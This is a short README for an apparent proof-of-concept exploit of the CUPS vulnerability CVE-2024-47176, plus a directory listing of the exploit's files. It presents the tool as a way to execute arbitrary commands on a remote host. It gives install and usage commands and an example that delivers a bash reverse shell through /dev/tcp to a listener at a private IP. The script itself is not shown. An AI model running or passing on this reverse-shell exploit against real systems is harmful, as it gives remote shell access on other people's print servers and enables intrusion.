# CVE-2024-47176 - CUPS Exploit
This exploit leverages a vulnerability in CUPS to execute arbitrary commands on a remote host.
## Installation
To install the required dependencies, run:
```bash
pip install -r requirements.txt
```
## Exploit
```bash
python cups.py <listening host> <remote host> <command>
```
```bash
python cups.py 10.10.10.10 10.10.10.11 'bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
```
[4.0K] /data/pocs/df1b6f713aa884c52d21c0606fc2cb2d42e58bfc
├── [7.3K] cups.py
├── [ 420] README.md
└── [ 10] requirements.txt
0 directories, 3 files